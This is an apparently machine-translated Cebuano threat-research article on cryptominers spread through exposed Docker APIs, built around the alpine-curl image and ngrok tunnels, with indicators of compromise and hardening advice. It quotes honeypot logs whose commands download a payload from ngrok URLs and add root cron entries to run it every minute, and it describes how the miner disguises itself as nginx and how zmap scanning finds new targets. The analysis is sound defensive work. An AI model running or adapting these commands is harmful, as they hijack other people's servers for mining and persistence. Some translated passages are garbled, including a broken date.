Among gi-analisar ang mga datos nga nakolekta gamit ang mga sudlanan sa honeypot, nga among gibuhat aron masubay ang mga hulga. Ug nakamatikod kami nga hinungdanon nga kalihokan gikan sa dili gusto o dili awtorisado nga mga minero sa cryptocurrency nga gi-deploy ingon mga rogue nga sulud gamit ang imahe nga gipatik sa komunidad sa Docker Hub. Ang imahe gigamit isip bahin sa usa ka serbisyo nga naghatud sa mga malisyoso nga mga minero sa cryptocurrency.
Dugang pa, ang mga programa alang sa pagtrabaho sa mga network gi-install aron makasulod sa bukas nga silingan nga mga sudlanan ug aplikasyon.
Gibiyaan namo ang among mga honeypots nga mao, kana mao, nga adunay default nga mga setting, nga walay bisan unsang mga lakang sa seguridad o sunod-sunod nga pag-instalar sa dugang nga software. Palihug timan-i nga ang Docker adunay mga rekomendasyon alang sa inisyal nga pag-setup aron malikayan ang mga sayup ug yano nga mga kahuyangan. Apan ang mga honeypot nga gigamit kay mga sudlanan, nga gidisenyo aron makit-an ang mga pag-atake nga gitumong sa platform sa containerization, dili ang mga aplikasyon sa sulod sa mga sudlanan.
Ang nakit-an nga malisyoso nga kalihokan nahibal-an usab tungod kay wala kini magkinahanglan mga kahuyangan ug independente usab sa bersyon sa Docker. Ang pagpangita sa usa ka dili husto nga pag-configure, ug busa bukas, ang sulud nga imahe mao ra ang kinahanglan sa mga tig-atake nga makatakod sa daghang bukas nga mga server.
Ang wala sirado nga Docker API nagtugot sa tiggamit sa paghimo sa usa ka halapad nga hanay sa , lakip ang pagkuha og lista sa nagdagan nga mga sudlanan, pagkuha og mga troso gikan sa usa ka espesipikong sudlanan, pagsugod, paghunong (lakip ang pinugos) ug bisan ang paghimo og bag-ong sudlanan gikan sa usa ka piho nga hulagway nga adunay espesipikong mga setting.
Sa wala mao ang paagi sa pagpadala sa malware. Sa tuo mao ang palibot sa tig-atake, nga nagtugot sa hilit nga pag-roll out sa mga imahe.
Pag-apod-apod sa nasud sa 3762 nga bukas nga Docker API. Base sa pagpangita sa Shodan nga pinetsahan og 12.02.2019/XNUMX/XNUMX
Kadena sa pag-atake ug mga kapilian sa payload
Ang makadaot nga kalihokan nakit-an dili lamang sa tabang sa mga honeypots. Ang datos gikan sa Shodan nagpakita nga ang gidaghanon sa mga nabutyag nga Docker APIs (tan-awa ang ikaduhang graph) miuswag sukad nga among giimbestigar ang usa ka misconfigured nga sudlanan nga gigamit isip tulay sa pag-deploy sa Monero cryptocurrency mining software. Niadtong Oktubre sa miaging tuig (2018, kasamtangan nga datos gibanabana. tighubad) adunay 856 lamang ka bukas nga mga API.
Ang usa ka pagsusi sa honeypot logs nagpakita nga ang paggamit sa imahen sa sudlanan nalangkit usab sa paggamit sa , usa ka himan alang sa pag-establisar og luwas nga mga koneksyon o pagpasa sa trapiko gikan sa publikong accessible nga mga punto ngadto sa piho nga mga adres o mga kapanguhaan (pananglitan localhost). Gitugotan niini ang mga tig-atake sa dinamikong paghimo og mga URL kung naghatud sa payload sa usa ka bukas nga server. Sa ubos mao ang mga pananglitan sa code gikan sa mga log nga nagpakita sa pag-abuso sa serbisyo sa ngrok:
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”Sama sa imong nakita, ang gi-upload nga mga file gi-download gikan sa kanunay nga pagbag-o sa mga URL. Kini nga mga URL adunay mubo nga expiration date, busa ang mga payload dili ma-download pagkahuman sa expiration date.
Adunay duha ka kapilian sa payload. Ang una mao ang usa ka hinipos nga ELF minero alang sa Linux (gihubit nga Coinminer.SH.MALXMR.ATNO) nga nagkonektar sa pool sa pagmina. Ang ikaduha usa ka script (TrojanSpy.SH.ZNETMAP.A) nga gidisenyo aron makakuha ug piho nga mga himan sa network nga gigamit sa pag-scan sa mga sakup sa network ug dayon pagpangita alang sa mga bag-ong target.
Ang dropper script nagtakda og duha ka mga baryable, nga gigamit sa pagdeploy sa cryptocurrency minero. Ang HOST variable naglangkob sa URL kung diin nahimutang ang mga malisyoso nga mga file, ug ang RIP variable mao ang ngalan sa file (sa tinuud, ang hash) sa minero nga i-deploy. Ang HOST variable mausab sa matag higayon nga ang hash variable mausab. Gisulayan usab sa script ang pagsusi nga wala’y ubang mga minero sa cryptocurrency nga nagdagan sa giatake nga server.
Mga pananglitan sa HOST ug RIP variables, ingon man usa ka code snippet nga gigamit aron masusi nga walay laing mga minero ang nagdagan
Sa wala pa magsugod ang minero, giilisan kini sa ngalan sa nginx. Ang ubang mga bersyon niini nga script nag-usab sa ngalan sa minero ngadto sa ubang mga lehitimong serbisyo nga mahimong anaa sa Linux environment. Kasagaran kini igo na aron malaktawan ang mga tseke batok sa lista sa mga proseso nga nagdagan.
Ang script sa pagpangita usab adunay mga bahin. Naglihok kini sa parehas nga serbisyo sa URL aron i-deploy ang kinahanglan nga mga himan. Lakip niini mao ang zmap binary, nga gigamit sa pag-scan sa mga network ug pagkuha sa usa ka lista sa bukas nga mga pantalan. Ang script nag-load usab sa lain nga binary nga gigamit aron makig-uban sa nakit-an nga mga serbisyo ug makadawat mga banner gikan kanila aron mahibal-an ang dugang nga kasayuran bahin sa nakit-an nga serbisyo (pananglitan, ang bersyon niini).
Ang script usab nag-pre-determinar sa pipila ka network range aron ma-scan, apan kini nagdepende sa bersyon sa script. Gitakda usab niini ang mga target nga pantalan gikan sa mga serbisyo-sa kini nga kaso, Docker-sa wala pa ipadagan ang pag-scan.
Sa diha nga ang posible nga mga target makit-an, ang mga banner awtomatiko nga makuha gikan kanila. Gisala usab sa script ang mga target depende sa mga serbisyo, aplikasyon, sangkap o platform nga interesado: Redis, Jenkins, Drupal, MODX, , Docker 1.16 nga kliyente ug Apache CouchDB. Kung ang gi-scan nga server motakdo sa bisan hain niini, kini ma-save sa usa ka text file, nga magamit sa mga tig-atake sa ulahi alang sa sunod nga pagtuki ug pag-hack. Kini nga mga text file gi-upload sa mga server sa mga tig-atake pinaagi sa dinamikong mga link. Kana mao, usa ka bulag nga URL ang gigamit alang sa matag file, nga nagpasabut nga ang sunod nga pag-access lisud.
Ang vector sa pag-atake usa ka imahe sa Docker, ingon sa makita sa sunod nga duha ka piraso sa code.
Sa ibabaw mao ang pagbag-o sa ngalan sa usa ka lehitimong serbisyo, ug sa ilawom kung giunsa ang zmap gigamit sa pag-scan sa mga network
Sa taas adunay gitakda nang daan nga mga sakup sa network, sa ilawom adunay piho nga mga pantalan alang sa pagpangita sa mga serbisyo, lakip ang Docker
Gipakita sa screenshot nga ang alpine-curl nga imahe na-download labaw pa sa 10 milyon nga beses
Base sa Alpine Linux ug curl, usa ka resource-efficient CLI tool para sa pagbalhin sa mga file sa lain-laing mga protocol, mahimo nimo . Sama sa imong makita sa miaging imahe, kini nga imahe na-download na labaw sa 10 milyon nga beses. Ang daghang gidaghanon sa mga pag-download mahimong magpasabot sa paggamit niini nga hulagway isip entry point; kini nga hulagway gi-update sobra sa unom ka bulan ang milabay; ang mga tiggamit wala mag-download sa ubang mga hulagway gikan niini nga repository sa kanunay. Sa Docker - usa ka hugpong sa mga instruksyon nga gigamit sa pag-configure sa usa ka sudlanan sa pagpadagan niini. Kung ang mga setting sa entry point dili husto (pananglitan, ang sudlanan gibiyaan nga bukas gikan sa Internet), ang imahe mahimong magamit ingon usa ka vector sa pag-atake. Mahimo kining gamiton sa mga tig-atake sa paghatud og payload kung makakita sila og sayop nga pag-configure o bukas nga sudlanan nga wala gisuportahan.
Importante nga hinumdoman nga kini nga hulagway (alpine-curl) mismo dili malisyoso, apan sama sa imong makita sa ibabaw, kini mahimong gamiton sa paghimo sa malisyosong mga gimbuhaton. Ang parehas nga mga imahe sa Docker mahimo usab nga magamit aron mahimo ang makadaot nga mga kalihokan. Gikontak namo si Docker ug nakigtambayayong kanila bahin niini nga isyu.
rekomendasyon
nagpabilin alang sa daghang mga kompanya, labi na sa mga nag-implementar , naka-focus sa paspas nga pag-uswag ug paghatud. Ang tanan gipasamot sa panginahanglan sa pagtuman sa pag-awdit ug pagmonitor sa mga lagda, ang panginahanglan sa pag-monitor sa data confidentiality, ingon man sa dako nga kadaot gikan sa ilang dili pagsunod. Ang paglakip sa automation sa seguridad sa siklo sa kinabuhi sa pag-uswag dili lamang makatabang kanimo nga makit-an ang mga lungag sa seguridad nga mahimo’g dili mamatikdan, apan makatabang usab kini kanimo nga makunhuran ang wala kinahanglana nga kabug-at sa trabaho, sama sa pagpadagan sa mga dugang nga paghimo sa software alang sa matag nadiskubre nga pagkahuyang o sayup nga pag-configure pagkahuman na-deploy ang usa ka aplikasyon.
Ang insidente nga gihisgutan niini nga artikulo nagpasiugda sa panginahanglan sa pagkonsiderar sa kaluwasan gikan sa sinugdanan, lakip ang mosunod nga mga rekomendasyon:
- Alang sa mga tigdumala sa sistema ug mga developer: Kanunay nga susihon ang imong mga setting sa API aron masiguro nga ang tanan na-configure aron makadawat lamang sa mga hangyo gikan sa usa ka piho nga server o internal nga network.
- Sunda ang prinsipyo sa pinakagamay nga katungod: siguruha nga ang mga imahen sa sudlanan gipirmahan ug gipamatud-an, limitahan ang pag-access sa mga kritikal nga sangkap (serbisyo sa paglansad sa sulud) ug idugang ang encryption sa mga koneksyon sa network.
- Sunda ug makahimo sa mga mekanismo sa seguridad, e.g. ug built-in .
- Gamita ang awtomatik nga pag-scan sa mga runtime ug mga imahe aron makakuha og dugang nga impormasyon bahin sa mga proseso nga nagdagan sa sudlanan (pananglitan, aron mahibal-an ang spoofing o pagpangita sa mga kahuyangan). Ang pagkontrol sa aplikasyon ug pagmonitor sa integridad makatabang sa pagsubay sa dili normal nga mga pagbag-o sa mga server, file, ug mga lugar sa sistema.
Gitabangan sa Trendmicro ang mga koponan sa DevOps nga makatukod nga luwas, dali nga maglansad, ug maglansad bisan diin. Trend Micro Naghatag kusog, streamline, ug awtomatiko nga seguridad sa tibuuk nga pipeline sa DevOps sa usa ka organisasyon ug naghatag daghang mga depensa sa hulga aron mapanalipdan ang pisikal, virtual ug cloud nga mga workloads sa runtime. Gidugang usab niini ang seguridad sa sudlanan nga adunay и , nga nag-scan sa mga imahe sa sudlanan sa Docker alang sa malware ug mga kahuyangan sa bisan unsang punto sa pipeline sa pag-uswag aron mapugngan ang mga hulga sa dili pa kini i-deploy.
Mga timailhan sa pagkompromiso
May kalabutan nga mga hash:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
sa Ang pagpraktis sa mga mamumulong nagpakita kung unsa nga mga setting ang kinahanglan una nga buhaton aron maminusan ang posibilidad o hingpit nga malikayan ang panghitabo sa sitwasyon nga gihulagway sa ibabaw. Ug sa Agosto 19-21 sa usa ka online intensive Mahimo nimong hisgutan kini ug ang susama nga mga problema sa seguridad uban sa mga kauban ug nagpraktis nga mga magtutudlo sa usa ka lingin nga lamesa, diin ang tanan makasulti ug maminaw sa mga kasakit ug kalampusan sa mga batid nga kauban.
Source: www.habr.com